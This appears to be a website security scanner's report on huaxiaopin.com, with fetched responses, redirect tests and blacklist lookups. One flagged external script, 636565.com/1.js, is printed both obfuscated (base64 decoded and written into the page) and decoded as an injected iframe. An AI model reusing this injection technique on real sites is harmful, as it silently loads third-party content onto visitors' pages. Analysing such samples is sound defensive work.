Scanned pages/files
Request | Server response | Status |
http://huaxiaopin.com/ | HTTP/1.1 200 OK Date: Mon, 10 Nov 2014 18:41:42 GMT Accept-Ranges: bytes ETag: "4a6dea20b9f8cf1:d99d7" Server: Microsoft-IIS/6.0 Content-Length: 356 Content-Location: http://huaxiaopin.com/index.html Content-Type: text/html Last-Modified: Wed, 05 Nov 2014 05:27:02 GMT X-Powered-By: ASP.NET | clean |
http://huaxiaopin.com/index.html | 403 Forbidden Content-Length: 1455 Content-Type: text/html | clean |
http://huaxiaopin.com/test404page.js | 404 Not Found Content-Length: 15262 Content-Type: text/html | clean |
http://636565.com/1.js | 200 OK Content-Length: 1242 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var url='PGlmcmFtZSBzcmM9Imh0dHA6Ly93d3cuODg4NTU1MC5jb20vIiBmcmFtZWJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJubyIgd2lkdGg9IjEwMCUiIGhlaWdodD0iNDI0OSI+PC9pZnJhbWU+';
var data=decode64(url); document.write(data); function decode64(input) { var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; var output = ""; var chr1, chr2, chr3 = ""; var enc1, enc2, enc3, enc4 = ""; var i = 0; ...[927 bytes skipped]... Decoded script: <iframe src="http://www.8885550.com/" frameborder="0" scrolling="no" width="100%" height="4249"></iframe> | ||
http://js.users.51.la/16884167.js | 200 OK Content-Length: 1979 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: huaxiaopin.com
Result:
HTTP/1.1 200 OK
Date: Mon, 10 Nov 2014 18:41:42 GMT
Accept-Ranges: bytes
ETag: "4a6dea20b9f8cf1:d99d7"
Server: Microsoft-IIS/6.0
Content-Length: 356
Content-Location: http://huaxiaopin.com/index.html
Content-Type: text/html
Last-Modified: Wed, 05 Nov 2014 05:27:02 GMT
X-Powered-By: ASP.NET
...356 bytes of data.
GET / HTTP/1.1
Host: huaxiaopin.com
Result:
HTTP/1.1 200 OK
Date: Mon, 10 Nov 2014 18:41:42 GMT
Accept-Ranges: bytes
ETag: "4a6dea20b9f8cf1:d99d7"
Server: Microsoft-IIS/6.0
Content-Length: 356
Content-Location: http://huaxiaopin.com/index.html
Content-Type: text/html
Last-Modified: Wed, 05 Nov 2014 05:27:02 GMT
X-Powered-By: ASP.NET
...356 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: huaxiaopin.com
Referer: http://www.google.com/search?q=huaxiaopin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: huaxiaopin.com
Referer: http://www.google.com/search?q=huaxiaopin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=huaxiaopin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://huaxiaopin.com/
Result: huaxiaopin.com is not infected or malware details are not published yet.
Result: huaxiaopin.com is not infected or malware details are not published yet.